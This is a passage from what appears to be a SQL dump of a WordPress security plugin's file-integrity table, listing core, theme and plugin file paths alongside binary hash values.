����@�t>��ɶ{T��8�o�','',0,'?'),('�G:��[���0v��N�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.si.php',0,'Ub�K�b�1d�/�>%','Ub�K�b�1d�/�>%','��8&A�\0�v��6�� �{~JO���1f','',0,'?'),('�M�Z�;5H��nX\"','wp-content/themes/square/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�R:�fqQK��Y �','Z\nf����w:>\r$�c�#����	I���j4U','',0,'?'),('�M)Džy懎�^LUv�','wp-content/plugins/spam-captcha/core/box.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�9�K �I�0�:E','�u�L�`1�9\0*Zv�/���戱v�:','',0,'?'),('�Q$����m�D.��','wp-content/themes/clean-magazine/css/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�ө\n�/;]s>','4�+_�[�������qpv,��{�l������','',0,'?'),('�`V�\\�������9�','wp-content/themes/twentynineteen/template-parts/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��Gm��xW���d','	N��ż	�I6h�%^�?`v�Y�=��2��','',0,'?'),('�sE����qD�� �W�','wp-content/themes/aqueduct/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�w 4f�dS�Μ','�Z�����}!�]�_�J�?gq���^���5�y','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��w�oB��-��','B��&݋�X��C�����*U��Ć�aȹİ�','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\"�)�<�����B','e��4����6�3�N�0�/�.4$^�','',0,'?'),('ڣC4̬��ђ��u','wp-content/themes/verbosa/cryout/js/customizer-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��\'�.�����k�','�(�Δ�o7�X�o�ҏ�m���`1��;Vh&J','',0,'?'),('ڨfEiK��S���k�','wp-content/themes/travelify/languages/travelify.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�*�J�/�2�^��X','��6+�0�p���AZ�9皑/U��y�\0','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('��4��d�8t�+b�q','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.iana.php',0,'ݵ�(Bg��g6��M','ݵ�(Bg��g6��M','������,�@�%�q�� �s���ө��','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z	�s�E����P|��','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��0f��2-���','ݮ@��r�Be��j��oCj���fl�p�	','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('���j�D2�\"�;6��','wp-content/plugins/unyson/framework/extensions/backups/includes/module/schedule/class--fw-ext-backups-module-schedule.php',0,'Ӻ�*�=F$.�/�UC�','Ӻ�*�=F$.�/�UC�','2W�\Zۆ�n\0��Ksg켡9$�rt�Z�#;','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ͣ��e�8Xh&&��','�/2g{�������Za��X\Z=��j�&-H�4��','',0,'?'),('�RQ}n{�qc|�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	�Ui3e������','~,;L0:\n��>)�	Z\n, i�P՞�>\\rCM','',0,'?'),('�!	�#���3/X\"!','wp-content/themes/nirvana/languages/hr.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j�[���\"��0','���d�c~��mdw��$�9D$u��IS��e','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��V+��g\'p(�Zo','wp-content/plugins/unyson/framework/includes/customizer/class--fw-customizer-control-option-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��0�>�_��K��o','\"\'�D�\"�=�!��$J�4[��|�Ũz=C�','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 	��i6b�渟�ghـ','�\Zk\'!���w�g��yv�\0ї5,�~���bx','',0,'?'),('�,���r�6ҝ}�)','wp-content/themes/fabulous-fluid/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�6�Szy�B2���','�+H�D�sB��T@Z�&ǩ�:x�x�\0�MƲ','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�4�^�OZc��ީ��M','wp-content/themes/nirvana/images/patterns/pattern3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xҳ+�6���5xD�V','�e_Cm�ZV���u_t�f8�^�ü��	�','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�>����γ�6��FUB','wp-content/themes/nirvana/templates/template-twocolumns-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?��p�PM>��L}r�','��>\'����0��}�<C��\'�i B�e�\\n','',0,'?'),('�G�ͷ�\0�x��S��e','wp-content/themes/travelify/images/background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t1���<�����Z�','�}��p�n���O�^|2��Β��X���','',0,'?'),('�jG�׆ey���,\ZH~{','wp-content/plugins/spam-captcha/core/include/tokenize/jquery.tokenize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�%mk8p6Un����','�謃kTх>adJz*����NܳI�k�V�','',0,'?'),('�kC\0�Y��Uh-�.','wp-content/themes/clean-magazine/inc/clean-magazine-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F����D͵�E�','e�l��\nA�5�[�����.q\"�!���t���,V','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6)�ݗ��)s��ub','f�;��e��݀I���ob��/m���)�g�T�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�B�=��&�','���I�c��*n�|< �N_�����V{\ZZNo�','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('۳���e�i��&�`�','wp-content/themes/wen-business/inc/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�㣼��BP�ʇu','��؁���@�{�R�����Mb+���@pS��\'/','',0,'?'),('۽�6�AF�+��gd�','wp-content/themes/skt-construction-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X����	#����#�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�ڨ�t�c	�˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y.��|�	�zo~��','�m`C/\r���~�����/#b\ZM͆��]�؍i','',0,'?'),('��0�/|�h�����s�','wp-content/themes/sg-window/inc/widget-items-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9@���Ȓnk�K�{�','�9N#�\\ڨ6���N�s�Ę���H��sM�~','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('������Zl�q	d�D','wp-content/themes/relia/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r0o�	�]�ߞ+^��','�K�o̎�N9�O���.3�dF��D?�>.','',0,'?'),('��ʡ����i�y��','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-permalinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U�xa4|ԭ��?�','OzI��R����Ps�ߺz<U$̞O=Q\'�','',0,'?'),('�]�>��aR��x�\n','wp-content/themes/square/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}yf����vJl�T','V��n\"��.Z�>��8���)v�\\E�n<�%\0','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�	v��d�H�:�!��','wp-content/plugins/spam-captcha/core/css/parameters_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/.��9\r��wr','�]�E�oE���8%��۬K���#N)�b-��','',0,'?'),('��_�@���B	 �d�','wp-content/themes/nirvana/fonts/sourcesanspro-semibold-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ebl2�h�����i','�RA\n��޵Q�\'8��M�sGNzˢYBs�x','',0,'?'),('�.�L0��!��^3�','wp-content/themes/nirvana/admin/images/schemes/Shades of Gray.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�\\{a~Ư\"Ha0\0','+;�dF�Y]�M�XI��$�WI��1��\r�	eG','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gI>���bG2��4�','���h�¦�f��v͍���l��?��0�š%Ee','',0,'?'),('�6�q���?��f�e��','wp-content/themes/alpha-store/lib/theme-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�ݟ�a��q��u','zw�a�yn^g�9�X�H(ǥ�vO�̱�n�=�','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�d������1�9�M��','wp-content/themes/mh-magazine-lite/includes/mh-custom-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����F�Y�O�\n�','{ME�Z���=`�m\\�����7���f���έ���','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('ܟ��)��G�$k�*�','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��\"as�q-���\"?B','���Z~�sr\\��h���@�g��R�x]�z','',0,'?'),('ܥ�[kmy}�QEާ','wp-content/themes/sg-window/img/icons/small/youtube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ .�s��E��B>�','�K-{��H ����[u�Ӛ���w�Q�3_�','',0,'?'),('�ÿ#�7��\Z;�E�^��','wp-content/plugins/wordpress-seo/deprecated/class-yoast-textstatistics.php',0,'�,&E�٢�u��L�\Zs','�,&E�٢�u��L�\Zs','_�\"ɒ��ү��kԬ�9��|]e�gI�@\'','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��`H֬�n1CK4w�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/config.php',0,'�$�xS{�_�$V3���','�$�xS{�_�$V3���','&qդ�Y+`�tW,�J�\'����s���E�','',0,'?'),('����oB�`���v','wp-content/themes/fabulous-fluid/inc/customizer-includes/customizer-sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'N��?��;�›V����','0i�\"��X �ƴUƋ�,#�ݹ��J�\n��I0�','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^.A\"����=�^_t','D�M�G���bzii�<�^����l�쥇�N��','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('���o+��&�U�PfA','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/jquery.fs.wallpaper.js',0,'�����������E','�����������E','�\\G�(�{��J!@y�|�*\Zg�T��i{��','',0,'?'),('�q�����%���O�','wp-content/themes/fluida/resources/fonts/socials.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I`��{fY@P2','��ɢ�W�\n���9���I�<�#�^yD�МS�(','',0,'?'),('�)�ވ.sچ�4����','wp-content/themes/sg-window/img/icons/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7U��0O֑7�^��|','8�I��T�h.;��\r1�����N���Yٟ5','',0,'?'),('�*���^�u����3�','wp-content/themes/barletta/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%>�I����Ǟ\n�4W\n','���f�0*��>���m�g#�\r�ؗ�+P�','',0,'?'),('�4�*_s_�r�L�','wp-content/themes/square/languages/sr_RS.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��2��!T}J��f','�M<s�.Av�A��ӯD�\0��7-�HUJ�','',0,'?'),('�9��R��I��','wp-content/themes/nirvana/content/content-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\07n�9��\r�=����','��,�V!Z�	�-y釨��m�藆�g*r�','',0,'?'),('�B\"inQ$����H�','wp-content/themes/aqueduct/img/giridpostbig.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eju@�	)��L�','�,�E�a���+j��R_�m.�)�w[OML','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�N�=ؙ�+¨�P�','wp-content/themes/morfeu/assets/sass/editor-style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U�%�I�s��','ڵڰ�/2�0���M��[a���\r�\\H(�','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ݜ�KA�`�8�=�','J�׼�}�T���M#M/�\'��1�=��<nݫ','',0,'?'),('�kf<�;���#�ꂺ\"','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_glass_65_ffffff_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.(�\\\'��3Ȩ��','ol�h���i6�#��K@J���ہ)G�\0Jϛ7','',0,'?'),('�v�d��uY&m�/�','wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/class-fw-extension-social-twitter.php',0,'�0��%#|�7,`���','�0��%#|�7,`���','#h��@Л�(�Z�x�����Ή��V�Z�','',0,'?'),('�w�s���Y�e�s{�','wp-content/plugins/contact-form-7/admin/includes/help-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N���JJ�G.o�E�','x�i����j@���ē�g�;��s�=Ɣ�rӰ','',0,'?'),('�|��R�\"�\n���7','wp-content/themes/travelify/languages/es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'v��Ͽ�8���','�N�霳Y!���k�&@�a#�]��P��Xz','',0,'?'),('݂�A/� �\'�ϕT�C','wp-content/themes/nirvana/fonts/yanonekaffeesatz-regular-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<��%��,��)�Q}','{o��*^%��=��ͥL��m�w���Q�~�','',0,'?'),('݋�rn}�z��w\'�','wp-content/plugins/contact-form-7/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�v��i�,�<,��','�\\C>,�x\0<v�\"8�l`�>2;6kMX:','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��p�L�>�c&�\r��','�;����� �.a��O��4�,>��k&܀%','',0,'?'),('ݙ�O��歶ើ�','wp-content/themes/verbosa/resources/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.c��� ��1��7�','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�UŽ�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e�	�','',0,'?'),('ݺ$;k��J�	�a�l1�','wp-content/plugins/contact-form-7/modules/select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M����\0g�u���','��nh��M�d�‹���{�8�TI�V���','',0,'?'),('�€����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('��\\����_�f3��y','wp-content/themes/skt-construction-lite/css/animation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%!i��{\\�n���i','EiU�\r�fcw,�ӎ$$�a�>y���w�J�','',0,'?'),('��A��]��D$��Ң','wp-content/themes/nirvana/admin/images/schemes/Chocolate Cake.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	א�D/Hɯ��w�ދ[','�B��k���W������_œ�?�*L�La.','',0,'?'),('����ٶ�l]3��d','wp-content/plugins/spam-captcha/core/img/tab_param.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�_�P����','�e� �С\">`����ջv]�I24]���o%D�','',0,'?'),('��T�b�\'�ax��[�','wp-content/themes/accelerate/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�a��TO��\r�T��','��Ə�\n�Û�Z�}m���:���t�\"u�˱�O','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�9b�u��	��(;�X','wp-content/themes/the-minimal/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W ����C�~O�E�s','/ن}���W��^�z��&�;tةIY-�y-�.','',0,'?'),('�M�dY���� �e	�','wp-content/themes/hueman/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��5��ْh�>�A','a�\"�1����ץD�R�>��Cvݝ᥿���ǚ','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('�*Kh05(�	��lK��','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-compatibility.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�Gq�u귖�H\r��','qG_��[Z�Dj�����Q_��c�k_�%��;��','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�&��<���)�W��u','wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/libs/ion-range-slider/ion.rangeSlider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*��*-����N���','�< ����\Z�K�|=K}�:m�E�� �aZ','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~M0�ű��y]��','�S�^��|ƥ������J-�A�itmeG','',0,'?'),('�F����^l����5d�4','wp-content/themes/hueman/functions/admin/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`���iilp�%� ','�����l4�ŧ೒1�imW�ZD)�8[��ƴ�','',0,'?'),('�L�C>д��ƹ1�','wp-content/themes/accelerate/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֨�C����h(��&P�','��[�n~�d\r�:ځ8.���h��)D@S4��','',0,'?'),('�MT.|�����Z���','wp-content/themes/wen-business/inc/hook/structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hh=�E�9rr�^�v��','n��A\\	����ݗڇ�Gv����!	n�]r1\0','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',0,'%��j*}&d�^�����','%��j*}&d�^�����','�z*�_S�W����\'�|�����`��\ry\n','',0,'?'),('�f\nwO�#��(���','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-content-fields.php',0,'O��c�d�R�g_�N�4W','O��c�d�R�g_�N�4W','�F���\0��#=���j!�Ab5���Q','',0,'?'),('�n�z���Av��t','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.zanet.php',0,'�m�uV9}�ޕB;M�','�m�uV9}�ޕB;M�','Q�*Tǚ~i���\n��U�[S�1}�J�i�� �','',0,'?'),('�s��#�y����>�0)','wp-content/themes/illdy/layout/css/owl-carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#̙��ӯ�ͪ��\"!','b��A���vx8j��v�c�v3|G9�M�B��\"�','',0,'?'),('�x#��=�K�r�X���','wp-content/themes/skt-construction-lite/images/default-banner.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ze�otb����ߥ+19','���LK�S��]�޸���c;cu���j�E�','',0,'?'),('�y�\"Nk��u��W���','wp-content/themes/verbosa/content/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�Z���XE�M~ۭl	','Y�D��0E��2�\\s[�����VZ�7','',0,'?'),('ނ���}С61�WU\0��','wp-content/themes/fluida/resources/fonts/blocks.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��-��&���l!�','U�1��Q;t�_~��9x��`LD��/V','',0,'?'),('ރ\n�H�\Z�����a�<P','wp-content/themes/square/css/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kP�k lf�`�F','xe���z�:��\Z��{�@xnj�~Q&#f�','',0,'?'),('ބk�++퉆@Y���','wp-content/themes/fluida/admin/images/3cSs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���\n��� ��3&','�4ӿ�@�r \r�T��.>�5��󝔒Ƭ','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('޴�_2=n\\Ȝ:\"d','wp-content/themes/travelify/library/panel/images/arrow-light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�i�IGk�����','�nqccU�&s���2�ǫ<�>�2�z�','',0,'?'),('�Ǜ����\nb6��R','wp-content/themes/hueman/assets/front/img/sidebar/s-left-dual-half-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�W������r��','GD-Ḁ��1��##/�W��f2@��x�^ �','',0,'?'),('��u��Z\"l*i�.B','wp-content/plugins/spam-captcha/core/js/feedback_admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+$Qw?i�q:�W��','�m#���.��ve�fʗ��7^��ӄC��`/a8','',0,'?'),('��*�u��Y�Ŧ$N�','wp-content/plugins/unyson/framework/extensions/backups/hooks.php',0,'y\"�t�ٗf�bUCk','y\"�t�ٗf�bUCk',']��ϲ�{������e�}x�y� 